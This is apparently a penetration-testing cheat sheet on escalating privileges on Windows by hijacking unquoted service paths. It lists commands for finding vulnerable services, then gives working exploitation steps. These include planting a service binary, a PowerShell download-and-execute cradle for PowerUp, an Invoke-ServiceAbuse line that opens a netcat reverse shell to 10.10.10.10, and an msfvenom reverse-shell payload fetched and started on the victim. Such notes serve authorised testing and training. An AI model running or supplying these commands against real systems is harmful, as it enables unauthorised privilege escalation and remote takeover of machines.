Unquoted Service Paths
If we find a service running as SYSTEM/Administrator with an unquoted path and spaces in the path we can hijack the path and use it to elevate privileges. This occurs because windows will try, for every whitespace, to find the binary in every intermediate folder.
For example, the following path would be vulnerable:
C:\Program Files\something\winamp.exe
We could place our payload with any of the following paths:
C:\Program.exe
C:\Program Files.exe
1. The following commands will display affected services:
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
wmic service get name,displayname,startmode,pathname | findstr /i /v "C:\Windows\\" |findstr /i /v """
gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name
sc query
sc qc service name
Then to check permissions on that path:
powershell Get-Acl -Path "C:\Program Files\Vulnerable Services" | fl
2. Exploit
Payloads to abuse services must be specific "service binaries", because they need to interact with the Service Control Manager. In Cobaly, when using the "Generate All Payloads" option, these have svc in the filename.
Standard users cannot stop or start services by default, so you would usually need to wait for a computer reboot.
Manual:
cd C:\Program Files\Vulnerable Services
ls
cd C:\Program Files\Vulnerable Services
upload C:\Payloads\tcp-local_x64.svc.exe
mv tcp-local_x64.svc.exe Service.exe
ls
run sc stop VulnService1
run sc start VulnService1
To restore the service, simply delete Service.exe and restart the service.
Metasploit:
exploit/windows/local/trusted_service_path
PowerUp exploit
To find the vulnerable application
C:\> powershell.exe -nop -exec bypass "IEX (New-Object Net.WebClient).DownloadString('https://your-site.com/PowerUp.ps1'); Invoke-AllChecks"
...
[*] Checking for unquoted service paths...
ServiceName : BBSvc
Path : C:\Program Files\Microsoft\Bing Bar\7.1\BBSvc.exe
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -ServiceName 'BBSvc' -Path <HijackPath>
...
Automatic exploit
Invoke-ServiceAbuse -Name [SERVICE_NAME] -Command "..\..\Users\Public\nc.exe 10.10.10.10 4444 -e cmd.exe"
- Example:
Detection
powershell -exec bypass -command "& { Import-Module .\PowerUp.ps1; Invoke-AllChecks; }"
[*] Checking for unquoted service paths...
ServiceName : unquotedsvc Path : C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe ModifiablePath : @{Permissions=AppendData/AddSubdirectory; ModifiablePath=C:\;IdentityReference=NT AUTHORITY\Authenticated Users} StartName : LocalSystem AbuseFunction : Write-ServiceBinary -Name 'unquotedsvc' -Path <HijackPath> CanRestart : True
ServiceName : unquotedsvc Path : C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe ModifiablePath : @{Permissions=System.Object[]; ModifiablePath=C:\; IdentityReference=NT AUTHORITY\Authenticated Users} StartName : LocalSystem AbuseFunction : Write-ServiceBinary -Name 'unquotedsvc' -Path <HijackPath> CanRestart : True
or
winPEAS.exe
[+] Interesting Services -non Microsoft-(T1007)
unquotedsvc(Unquoted Path Service)[C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe] - Manual - Stopped - No quotes and Space detected
Exploitation
# Attacker
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > Common.exe
sudo python -m SimpleHTTPServer 80
sudo nc -lvp <PORT>
# Victim
cd "C:\Program Files\Unquoted Path Service\"
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://<IP>/Common.exe', '.\Common.exe') or if we have the malicous binary alredy downloaded in other directory: copy C:\PrivEsc\reverse.exe "C:\Program Files\Unquoted Path Service\Common.exe"
sc start unquotedsvc
Last updated